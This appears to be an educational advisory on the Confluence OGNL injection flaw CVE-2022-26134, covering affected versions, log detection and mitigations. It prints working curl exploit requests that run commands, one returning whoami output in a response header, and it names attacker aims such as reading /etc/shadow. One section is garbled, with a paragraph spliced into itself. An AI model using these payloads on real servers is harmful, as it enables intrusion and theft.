CVE Series: Confluence RCE

CVE-2022-26134

What is Confluence?

Confluence is a widely used collaborative software designed to streamline teamwork and knowledge sharing within organizations. Developed by Atlassian, Confluence provides a digital platform where teams can create, share, and organize various types of content, such as documents, project plans, meeting notes, and more. It serves as a centralized hub that fosters collaboration by allowing team members to collaborate in real-time, provide feedback, and make updates to shared documents. Confluence offers a user-friendly interface with features like rich text editing, version control, and customizable templates, making it versatile for a range of use cases, from project management to documentation and beyond. This software facilitates efficient communication and knowledge management, enabling teams to work cohesively regardless of their physical location, ultimately boosting productivity and enhancing the organization's overall operational effectiveness.

How is it vulnerable?

This vulnerability constitutes a form of injection flaw that permits unauthenticated remote code execution (RCE) by exploiting the Object-Graph Navigation Language (OGNL). OGNL, an open-source expression language for Java objects, is the underlying mechanism. While more details can be explored on Apache Commons, it's crucial to understand its role. This expression language was similarly employed as an attack vector in the Equifax breach of 2017, elaborated upon in our OWASP course. In this instance, specific versions of Confluence are susceptible to manipulation via a tailored web request using various methods (e.g., GET, POST, PATCH, TRACE). By inserting OGNL expressions, an attacker can trigger the execution of arbitrary code, potentially leading to severe consequences.

Vulnerable Versions:

  • from 1.3.0 before 7.4.17

  • from 7.13.0 before 7.13.7

  • from 7.14.0 before 7.14.3

  • from 7.15.0 before 7.15.2

  • from 7.16.0 before 7.16.4

  • from 7.17.0 before 7.17.4

  • from 7.18.0 before 7.18.1

Haven't I seen this before...?

Experiencing a sense of déjà vu in light of the 2022 Confluence vulnerability is understandable, given its resemblance to a prior issue disclosed in August 2021—another instance of an unauthenticated OGNL injection flaw. This recent vulnerability came to light on June 2nd, 2022, accompanied by a maximal CVSS score of 10, signifying its utmost severity. The vulnerability's classification as critical results from its minimal access requirements (merely for system communication) coupled with its potential to expose valuable data or enable code execution.

The Vulnerability:

The vulnerability at hand is an OGNL injection flaw impacting the HTTP server. The OGNL payload is inserted into the URI of an HTTP request, irrespective of the method employed—whether valid (GET, POST, PUT, etc.) or invalid (like "BALH"). The exploit, demonstrated below, involves a URL-encoded version:

curl -v http://10.0.0.28:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/

When decoded, the exploit appears as:

${@java.lang.Runtime@getRuntime().exec("touch /tmp/r7")}

The intrusion is usually detectable in access logs due to its presence in the HTTP request field. A sample log entry on our test Confluence (version 7.13.6 LTS) after exploitation is:

[02/Jun/2022:16:02:13 -0700] - http-nio-8090-exec-10 10.0.0.28 GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/ HTTP/1.1 302 20ms - - curl/7.68.0

Identifying vulnerable servers is straightforward as attackers can compel the server to send command output in the HTTP response. The following request demonstrates this behavior, returning the response of whoami in the attacker-created X-Cmd-Response HTTP field:

curl -v http://10.0.0.28:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/

The response includes X-Cmd-Response: confluence, as evidenced in the HTTP response. The exploit employs the exec call to save output and uses setHeader to include the result in the server's response to the attacker.

How do I know I am affected?

The purpose of these maliciously crafted URLs is to run commands and downlThese specially crafted URLs are designed with the intent of executing commands and downloading webshells. These actions provide attackers with an initial foothold on the server, enabling them to pursue additional malicious activities, such as deploying cryptominers. According to Veloxity's findings, this Confluence RCE vulnerability was exploited by adversaries who executed commands in real-world incidents. Their objectives included extracting data from the /etc/passwd and /etc/shadow files, attempting to access databases, and manipulating web logs to obstruct forensic analysis efforts.oad webshells, allowing attackers to gain a beachhead on the server to conduct further malicious actions such as installing cryptominers. Veloxity reports that in the case of this Confluence RCE vulnerability, adversaries executed commands in the wild in their attempt to read the contents of the /etc/passwd and /etc/shadow files, attempting to read databases, and altering web logs to hinder forensic investigative efforts.

Mitigation:

Some general mitigation guidance is to block external (internet-facing) traffic to Confluence servers. If this cannot be done, you should:

  • Implement an IP allowlist

  • Ensure requests being made to the server are logged and ideally ingested into a SIEM

  • Monitor server child processes for suspicious activity to detect webshells

  • If you are using a WAF, ensure rules are updated to block this CVE